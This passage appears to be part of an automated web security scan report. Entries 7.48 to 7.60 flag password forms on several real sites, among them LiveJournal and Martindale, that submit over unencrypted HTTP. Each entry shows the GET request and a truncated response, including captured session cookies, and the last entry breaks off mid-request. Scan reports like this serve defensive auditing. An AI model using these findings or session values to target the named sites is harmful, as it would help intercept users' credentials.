<link rel='stylesheet' href='/css/pgview.css' t
...[SNIP]...
<hr>
   <form action="http://www.librerio.com/inbox" method="post">    <table>
...[SNIP]...
</b>&nbsp;<input type='password' name='loginpw' size='20' maxlength='20' value=''><p>
...[SNIP]...
7.48. http://www.linkagogo.com/go/AddNoPopup  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:13 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS9jz87w"
Last-Modified: Sun, 17 Apr 2011 14:14:14 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Sat, 07-Apr-2012 14:14:13 GMT
Set-Cookie: userName=guest; path=/; expires=Sat, 07-Apr-2012 14:14:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 17084

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<form name=urlEdit method="post" action="/go/AddNoPopup">
<input type="hidden" name="target" value="null">
...[SNIP]...
<td>
<input type="password" name="password" value="" size="8">
</td>
...[SNIP]...
7.49. http://www.livejournal.com/update.bml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 17 Apr 2011 14:14:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws34
Set-Cookie: ljuniq=b5UUqFDJWUNNLQN:1303049658:pgstats0:m0; expires=Thursday, 16-Jun-2011 14:14:18 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
X-Frame-Options: deny
Cache-Control: private, proxy-revalidate
ETag: "194009227f3a4d23657df148b580d6ac"
Content-Language: en
Content-Length: 49639
X-Varnish: 1706190852
Age: 0
Via: 1.1 varnish

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<td>

<form method='post' action='update.bml' id='updateForm' name='updateForm'>

<input type='hidden' name="lj_form_auth" value="c0:1303048800:858:86400:SYlILbpB7Q-0-b5UUqFDJWUNNLQN:02df13cf1d18f92cb5825c659e884be3" />
...[SNIP]...
</label>
<input type="password" maxlength="30" tabindex="6" name="password" class="text" id="altlogin_password" size="15" />
</p>
...[SNIP]...
7.50. http://www.longislanderotic.com/longislanderotic/forum/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /longislanderotic/forum/ HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
Referer: http://www.longislanderotic.com/landing.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:44:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21036
Content-Type: text/html
Expires: Fri, 15 Apr 2011 12:44:32 GMT
Set-Cookie: WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3f7ef8f78126585da9396zfdab5296d4; expires=Tue, 17-Apr-2012 12:44:32 GMT; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSBBADSQ=OFDDCGFBOBAANIHGHJNBKAIJ; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...
7.51. http://www.longislanderotic.com/longislanderotic/forum/default.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /longislanderotic/forum/default.asp HTTP/1.1
Host: www.longislanderotic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQSBBADSQ=NFDDCGFBPBNGBOOILNHIBEPM; __utmz=231616898.1303044274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3128zc3fd887z6ef12cafc4a7azdcf6e; __utma=231616898.1868230739.1303044274.1303044274.1303044274.1; __utmc=231616898; __utmb=231616898;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21757
Content-Type: text/html
Expires: Fri, 15 Apr 2011 14:14:20 GMT
Set-Cookie: WWF=LV=2011%2D04%2D17+07%3A14%3A21&SID=9e6cb951e3575fea424357ca8339d43a; expires=Tue, 17-Apr-2012 14:14:20 GMT; path=/longislanderotic
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...
7.52. http://www.longislanderotic.com/longislanderotic/forum/insufficient_permission.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/insufficient_permission.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /longislanderotic/forum/insufficient_permission.asp HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3128zc3fd887z6ef12cafc4a7azdcf6e; ASPSESSIONIDQSBBADSQ=NFDDCGFBPBNGBOOILNHIBEPM; __utma=231616898.1868230739.1303044274.1303044274.1303044274.1; __utmb=231616898; __utmc=231616898; __utmz=231616898.1303044274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:44:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 9058
Content-Type: text/html
Expires: Fri, 15 Apr 2011 12:44:38 GMT
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<div id="progressFormArea">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp?FID=0" onSubmit="return CheckForm();" onReset="return confirm('Are you sure you want to reset the form?');">
<table cellspacing="1" cellpadding="3" class="tableBorder" align="center">
...[SNIP]...
<td><input type="password" name="password" id="password" size="15" maxlength="15" value="" /> <a href="javascript:winOpener('forgotten_password.asp','forgot_pass',0,1,570,350)">
...[SNIP]...
7.53. http://www.longislanderotic.com/longislanderotic/forum/login_user.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/login_user.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /longislanderotic/forum/login_user.asp HTTP/1.1
Host: www.longislanderotic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQSBBADSQ=NFDDCGFBPBNGBOOILNHIBEPM; __utmz=231616898.1303044274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3128zc3fd887z6ef12cafc4a7azdcf6e; __utma=231616898.1868230739.1303044274.1303044274.1303044274.1; __utmc=231616898; __utmb=231616898;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 9865
Content-Type: text/html
Expires: Fri, 15 Apr 2011 14:14:20 GMT
Set-Cookie: WWF=LV=2011%2D04%2D17+07%3A14%3A21&SID=ae36256bb374f6929c3dca61e7b6zz63; expires=Tue, 17-Apr-2012 14:14:20 GMT; path=/longislanderotic
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<div id="progressFormArea">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp?FID=0" onSubmit="return CheckForm();" onReset="return confirm('Are you sure you want to reset the form?');">
<table cellspacing="1" cellpadding="3" class="tableBorder" align="center">
...[SNIP]...
<td><input type="password" name="password" id="password" size="15" maxlength="15" value="" /> <a href="javascript:winOpener('forgotten_password.asp','forgot_pass',0,1,570,350)">
...[SNIP]...
7.54. http://www.martindale.com/ContactUs.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /ContactUs.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ContactUs.aspx HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:56 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954557277473&InitialSearchId=201104160954557277473; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 64739
Connection: close
X-RE-Ref: 1 -2133384255
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Contact Us</title>
<meta http-equiv="Conten
...[SNIP]...
<body onload="contactUsInit()">
<form name="frmContactUS" method="post" action="/ContactUs.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="frmContactUS">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl01$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl01_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.55. http://www.martindale.com/all/c-england/all-lawyers-1.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-1.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-1.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:28 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954287277539&InitialSearchId=201104160954287277539; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 94108
Connection: close
X-RE-Ref: 1 2133459339
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-1.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.56. http://www.martindale.com/all/c-england/all-lawyers-10.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-10.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-10.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:56 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954577277646&InitialSearchId=201104160954577277646; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90129
Connection: close
X-RE-Ref: 1 -2143489616
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-10.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.57. http://www.martindale.com/all/c-england/all-lawyers-11.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-11.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-11.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:48 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954497277627&InitialSearchId=201104160954497277627; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 91416
Connection: close
X-RE-Ref: 1 -2142286042
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-11.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.58. http://www.martindale.com/all/c-england/all-lawyers-2.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-2.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-2.htm?c=N HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=4536f10003b84d77a65f457425f341af; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi02f0ex2c45; op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi02f0ex2c45; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302912241758:ss=1302912241758; MH_survey_MDC64=2; __utma=205508303.24449278.1302905514.1302905514.1302912242.2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 94165
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rky33raxqbxwd045bmozrc45; path=/; HttpOnly
Set-Cookie: mdc_session_id=ede5124cf8ba4baf8d1f4a707220d522; expires=Sat, 16-Apr-2011 14:42:05 GMT; path=/
Set-Cookie: refDomain=www.martindale.com; path=/
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=ede5124cf8ba4baf8d1f4a707220d522&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:42:06 GMT; path=/
Date: Sat, 16 Apr 2011 13:47:06 GMT
X-RE-Ref: 1 1691745825
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-2.htm?c=N" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.59. http://www.martindale.com/all/c-england/all-lawyers-3.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-3.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-3.htm?c=N HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-2.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=4536f10003b84d77a65f457425f341af; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; mdc_session_id=e42928a5acac4e6598b36e4172c30143; refDomain=www.martindale.com; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0e03nh4d09; op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0e03nh4d09; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961642795:ss=1302961642795; MH_survey_MDC64=3; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; __utmb=205508303.1.10.1302961643

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93552
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:43:42 GMT; path=/
Date: Sat, 16 Apr 2011 13:48:41 GMT
X-RE-Ref: 1 1788055145
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-3.htm?c=N" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.60. http://www.martindale.com/all/c-england/all-lawyers-4.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-4.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-4.htm?c=N HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-3.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
